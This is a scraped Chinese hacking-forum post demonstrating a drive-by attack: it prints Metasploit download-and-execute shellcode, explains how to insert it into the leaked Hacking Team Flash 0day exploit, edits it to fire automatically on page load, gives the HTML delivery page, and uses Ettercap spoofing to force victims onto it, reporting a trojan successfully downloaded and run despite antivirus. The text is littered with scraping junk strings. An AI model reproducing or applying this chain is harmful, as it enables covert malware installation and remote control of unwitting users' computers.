找回密码
 立即注册
查看: 2598|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

( H) K! O+ R! F8 P7 S' O, V 三、flash 0day之手工代码修改制作下载者实例入侵演示 , e0 |0 {% o$ B, S& A+ X0 ]. `

( x; K) h- ~1 v* C: A

/ h5 W8 U M+ P A0 y 利用到的工具: * p$ F k% J) S9 Z6 c

5 v- U6 s4 D k% b+ ?9 V y2 U; b

1 @8 S% m* |- I! e6 O Msf ! V' z/ g$ c2 t& t$ ^

* V' z3 u" `8 ?9 C8 y

5 R8 F8 @1 Z4 x1 H Ettercap 2 S& c* }+ F7 g; O! |& k

. o* `) `# r4 Y# R+ l

) o/ Q7 m/ g3 l: u Adobe Flash CS6 9 H0 J; j8 l1 J, v& a E. K

6 V& g# X; o/ n# {

7 V2 `/ R3 E5 I2 d; ]# ?' | Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ' `2 O) u1 B4 q

+ {0 W% K3 [2 i) m0 Z# u

0 Q6 Z0 \- F6 u2 a 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options - k3 m8 y2 f3 N; d5 Z# n C2 R2 z

/ E5 B3 g1 X3 Q; c

8 J/ F9 N8 n U0 I, A2 I" M- s 如图: - E/ O7 z) m/ w2 n, m

% z: Y, o: ^" a0 }6 Q# b; j) g) D

& T4 W$ d/ e4 a) ?* K   : f+ z4 a2 @- _+ E$ r1 Q& \

, w7 y. V7 V5 D: i0 z

* J) m4 \1 S" Q! X0 T   3 [8 C5 J9 I/ e4 \* S

, x @# l' i' y( c" w7 }6 `

( N4 |0 n8 W8 R2 r4 f 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 1 l V w* Y" D9 r. v5 a0 @0 V% A

( b6 c. X/ ?, T1 l

1 C2 b4 C0 @* {3 p! G* p$ Z! p   ! [/ A9 C6 p7 ^7 G; O

5 x+ Y* N( ~ X; q- }" l

- w; k) k* [6 f9 M   / O. @; J6 o9 a

& @3 \* @& f% g! }

9 y$ [. r- W; E( G- | 然后执行generate -t dword生成shellcode,如下: # j2 v" i6 O! @8 Q6 C

! u5 v. b1 i; d- H/ R) b; v, |

+ k0 J$ O8 T5 U' d, c: ^   & p, _3 }' u- g3 V0 c1 |6 T

# |: A, {; y5 `( Y1 t

3 i( |) ~: F0 ` 复制代码到文本下便于我们一会编辑flash exp,如下: ! v/ ~4 w2 g V$ X" j a

* G5 V4 a8 J- q4 i. ^7 P7 k

1 x( W2 s) X8 O/ ^ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 3 S9 U$ Q9 }3 |; X# t. F

# r8 B' B3 X( b0 g* h& C" \9 L

1 p' K" `8 ]! Y( u* I- V7 u 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, : S+ y$ U* p2 N4 q' }% l- y

# P8 o( K0 @# S V* ~; `

9 C- Y: x, H- Q. G; U7 ^+ K& t3 r 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 2 N0 {5 D& o5 P1 P2 B9 v% f, C \

7 E# L3 h7 j. I$ u( w: u

6 Z, D; }: e! r 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ; f# A$ M: W8 U, a6 L6 f. [1 u/ i

4 j9 L# j8 q0 v

i/ K& A6 _2 ^" q; u1 c% k0 l 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 4 B, `# E7 U" P. J, Q+ N0 q8 A

3 K1 t& d. q3 A, B2 F, A

/ t7 U L4 q- Q- E4 q% n 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, . z" A) u2 H" Q! H3 N# H' F, ]# a

- ], B, W. ^- a

% K Y, ~# o8 Z1 N 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 7 A8 p# l4 Z* H7 Z; V

5 N5 l) R2 D1 G' ]

3 g/ \6 e, g5 [/ O) o8 c 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 3 t* J% _( T7 B6 V5 W

2 }+ q: D% T' e( \

- M, i [1 ^4 R$ a$ w 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, - X5 W5 D; |& d% |) V X

. x9 o0 L) R1 z3 M& h" i; K3 r) P6 {

; T) b1 I' m% r. y i" F5 m; z 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 7 |) g1 }) E& U- Q+ O) y+ \

) Q* R# W+ P! a0 Q/ Q+ K

4 j5 @8 b- m+ v$ s/ b6 o4 R 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, - |/ @$ o( E* r1 `1 i

* ~' O; y/ e9 i2 N& Y) e

! M) K1 T. V# R 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 2 v$ j7 U: S! E$ e& r7 o+ `

! A' T- I6 C1 X" \( U ]

+ |6 T- z: u0 ]$ i! ^: b% M 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ; ?9 F0 M8 [. ~ ~) V, V4 t% T

5 j9 o" C' s9 X% E2 |- T, q

4 \4 ^# M% V! ]' L! G# e8 M 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 0 {2 H0 q1 i; X0 t$ ?" Q

* k8 S/ T, N( B) ~

/ ~# {) N5 x" z: h3 T' X2 c a/ L   4 k0 R% ^- U6 s! X/ P5 f4 `

2 B8 ^9 e/ d& U N ]

. ~. l; Y' P" q K$ @1 N   / e" T: @% `% J1 r6 n# I- @% ]

8 k0 l; I! c4 k0 t: }) ^

+ p; ~& h0 x- Z8 ?. [8 w( q, R: o 下面我们来修改flash 0day exp,需要修改三个文件,分别为: . O: Z+ v; x% k4 b

3 ~* y) `( ]/ k" ?0 P" E8 U Y

7 G9 w- `; l4 Z( [: A9 d   & _: A2 C, p: d! v

$ y1 O1 X! L" E6 G3 Q+ _6 l

$ ^4 N/ U: }* U 先修改ShellWin32.as,部分源代码如图: $ k) O) I' \; L) r) n0 e. w

4 O8 i. c4 N* p$ x

3 o: d2 b. c5 ~) B0 Y8 w- Z   * R0 f3 b& \9 H( {

# v+ H/ v2 k+ f7 w1 n

" j% l& G2 M0 V, _$ s 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ! ~( ]& G9 O+ ^" d% @' T! X. o: @8 W

' b( w9 E" q+ t+ z7 U! J! U

1 t6 B# _ [$ Z4 F   ; X% ^8 d& @7 j/ y( ^

0 v+ o8 R3 y) z( T1 M2 X

- L9 s; l. d6 {. l 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: . g- I d) Q$ U6 o# a

' B3 g. q5 f1 C

1 m: z. E. G" Y% C( C) G: l- U   " r+ b# l U6 p: l

, \9 w/ O% ]3 p4 f

Q/ v1 n3 l! R$ p 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: & O9 |" n! J1 }& L. s. L! G

$ L- O7 K: [5 X4 }/ q

) g3 N& E4 ^3 a9 [" M. \ b   $ }8 @$ f. b: K `# v+ d

0 {6 s* [0 b3 F4 c7 o' b6 v! D

6 W6 g6 F) m5 m: M0 ~* `   + {) q1 s5 s9 G# G% n

: M" v* N; B& d G. |& W9 L' c% H

% o" e7 G4 ?3 z' F8 e   0 F1 g; d/ e8 S; R5 e6 Y; Q; V1 I5 O) c

4 y; ?4 N, G) B0 w4 f# Y) g, r

+ m! [3 [% L7 Z 然后点保存,下面我们来编译一下,打开 + s& \6 L: ?+ D+ ~. ~7 Q" Q6 M

+ ]" m; D) R0 B$ a7 S

! x+ ~& V( [3 z+ m3 }8 W exp1.fla然后点文件-发布,看看编译没错误 4 r4 r- A: m" i, z1 Y

/ I9 d; o7 H9 m! _& h9 [4 n; `

, c* t! h; `. ^' V3 ?; ?3 n2 H   - r8 B B: a, B; V" u: @, L

; D, J, B! X* p/ w3 D

- n5 y* h5 e- I$ t1 l   % s0 g M! h' p4 J

4 C' w& q% Y; i; u. f3 G" {% j

# w, J, l% a; b   ' O$ s5 o" C$ o/ x8 G

" o$ N; O) E" E* w' h4 O; S

+ w6 z* x' h/ i) c5 L! I# |   7 M5 `1 F0 }, N

, Y4 e5 A. Y( }) L% m' ~5 T

9 t1 J( p' x( _ T4 T 然后我们把生成的 7 Y5 o1 i3 o2 G: K+ t/ f+ w

9 k4 Z1 M- F2 [* G/ R4 t

; n6 p/ |3 @, r2 W9 I8 Z) W$ r exp1.swf丢到kailinux /var/www/html下: . d2 s9 c( g) G$ g+ T2 N/ u

3 n3 x7 {- I6 X2 Z2 N& Q9 ? Y

* F/ W% V w; ?- D9 ^- q9 N 然后把这段代码好好编辑一下 5 ^, Y: b/ N% e# t+ c9 o

& a: a: B4 O1 }1 [! ~+ A. Q

8 h5 `0 o# U/ F# c+ m   ' g0 U8 h" ?( T: b. W& C& a

& R1 u) T$ b. }1 a. Q

) N: r4 Q0 n% j1 f   & ]8 t& j% U: U

- f. `) G* W0 `# M% Q3 |- A, d

l0 K3 {& t$ S. U   8 c/ i: Z* s! E8 w

# P; |4 k# S% p

& s9 `, H# ^3 q: q4 P) L. |; |: C   6 R" w7 s6 x% X0 E7 Z6 k

& k) c( ~% j; s5 A, [- u

/ }4 r% w. `$ l& _2 y5 p% ]; E   ' i) z8 o. l/ m. `' T! M+ W5 ?( y

- g/ f% b2 n2 L

. r0 O, S$ t: L4 n3 Y- a( X   9 R* H* G1 v/ p+ D) d

& I6 P3 T% n! f& Y. k

" i/ M7 Q- e1 k/ k/ w <!DOCTYPE html> 5 a& g8 E* |: }/ d

/ J5 g6 a I2 P+ n- P: K9 _

( }4 M! u* T% n, Y- b" R5 ] <html> 5 Z$ F& n4 L5 W# i2 l0 u1 y3 p* W

7 K# Q: A! X; @+ t& V& q2 w2 K% s

* K0 n& F1 H/ [ <head> $ V9 H5 C8 b F5 ]; W

5 X( k" W' G. {8 G* {& q+ e

6 k$ Q( A, X' ~ P F9 R- ]$ K. u <meta http-equiv="Content-Type" content="text/html; ) X/ V$ n! L3 k* s2 D

) D" B8 r& B! P8 ~) e! u

$ Y2 x) U1 F( e2 {" p! Q( ~- ^ charset=utf-8"/> 8 I# [ a) n3 B! i

- z& I# e R- @( U

, u, A9 K: v/ o, H( f6 [( g </head> 6 C |% ]# g$ P, {( p0 z! k

" ~) l2 Y- t3 _: M; v

, G+ {. B8 F" |! i( p! V <body> @6 U w8 H% q$ j6 C

* Q& Z/ }6 J% i( g

; v. p. B, p* p4 V; _* M6 ^+ i <h2> Please wait, the requested page is loading...</h2> ( C3 R( c' f9 |! ^8 l0 R! Q5 y+ x! N

3 e5 j3 M+ M- ?: h. ^

; i3 v |5 g' \- X <br> 8 O- l) m9 H4 L# [

& }5 ?2 H4 x& w9 i. P. @

6 c* q" o. P( H) o$ G <OBJECT ! g- z3 r7 m/ @1 y$ P( e: ^, c

# R+ W! |( s6 N. e" p0 i$ n- P

0 @$ o. W, P& w classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie . b: W* \( Z: x+ M

9 S+ b9 C7 \( }

6 m6 T% U5 C$ S- d* D/ l VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 9 C2 N1 p6 f* h! B. y1 v6 q" r, g

& _1 J6 ?* ~% p7 _. a

+ L. s! A6 F/ A; s: l7 `1 U </body> 8 {) n% e. Z2 | Y1 s. S" A

8 m( m: ~% D6 H& i5 U0 o

4 c M6 ?/ n4 } <script> 0 x- W2 A' c& T9 ~

/ {9 M4 [7 n( p v9 S. K" P% b

+ H8 d; G( @ L' }- V     setTimeout(function () { - p; t7 O: S2 L4 a' e: m" g4 ^

5 X' v6 b9 I0 T% G

5 F1 @0 q( ~9 |) z9 A          ! u6 _: P. y. q7 A G

?; r$ c5 ]4 J1 e( r$ }' f5 O1 h; u

4 `) A% Q* |: s8 E( v$ Y window.location.reload(); / e p1 g# d4 B& d$ s( j

( s8 }( S8 i! p( {& i

8 o2 L i! m9 p9 t: c7 F, {1 t     }, 10000); . d" j t7 Y! V' }3 R& K- D

8 i: f( O# m+ M. B. R6 L* A8 N8 W

8 |' F" q0 D4 r ^; {/ i# U   % l7 ~7 G$ L% y" P7 v1 f

/ a4 J9 b1 x, o. [1 D3 u- f9 o9 h$ T3 g

( n+ Y3 g& g; ^% Y </script> ) t& b' w' j3 a0 r4 t

, P& t8 x- {) c1 U$ ]+ t1 H7 r

" W3 w6 s4 l. b. q& x# L </html> " n8 {% S. c9 i& S" s: E- T

1 A. M" y& |/ ~# b2 }. C

$ V, M! N1 b: T( @5 E   ) P9 J* P! L. @" U0 Z

7 K2 @8 S$ [& A$ B% [+ H

4 i3 N' v0 Z& N. D5 ?+ `$ a 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 8 ^9 U6 \4 |) x/ {% z# @

2 }! Q; J; ?5 f: v& i

$ {6 N" f4 i8 B' R7 d+ w8 M- F3 n   & s8 o; J0 |# s( P6 R/ z

# c4 g2 n( q( V l4 C% X

- B) j6 J0 ~9 s* _4 p' x   , v. m+ \* o( I

7 m* @! q/ v3 @1 c+ K, Z0 ~

. q6 }4 n6 D$ g/ W   # J @4 a1 u; s$ V) U

8 i9 C9 Y, U) g& c0 \& i

8 Y$ q$ h3 |# O) q9 G' Z   Z6 o" c) `% l9 U% T3 [

; Y! R. V. _& G" l2 q

) u* g; c3 h% ~   . W" {# V3 S" W y

' S& l: x2 P: h% o A* ]

* s9 K3 d. r2 ?0 ^5 a) w 下面我们用ettercap欺骗如图: 5 a2 ^" t. v9 v; T

' I# H8 M4 y' t2 c. e. Z

8 G/ k% k& s: Y9 p) |   4 g7 p5 k% C$ n- }# b

# D5 i2 z2 \# C# R8 M- d/ w5 g5 X" A

" O3 F1 [6 o1 e' z   0 U, V/ p0 L" i: E5 P/ o- c

& P" T9 L% {* |6 O

! Q& H: n' n X$ i4 ?# v 下面我们随便访问个网站看看: $ ?) _( r% p# s' }/ y7 C) d

( L1 G) R6 r" [

1 S( `" o% X: T% a% E 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 6 a% O( o' h Y5 {

3 g% A! b. d: D8 [1 z

9 B( m) G7 q9 |   6 R( @0 p4 h$ w

5 m- s+ B; k$ J' b( `, Y

5 o+ U; B3 s( S9 k% n }% L 我们看另一台, 4 Z1 O( N; z1 _+ q

% p/ h2 e* P3 w* W* T

) I& P* O6 `7 q) w& t 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 2 M- K: T5 t4 [: k1 x

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表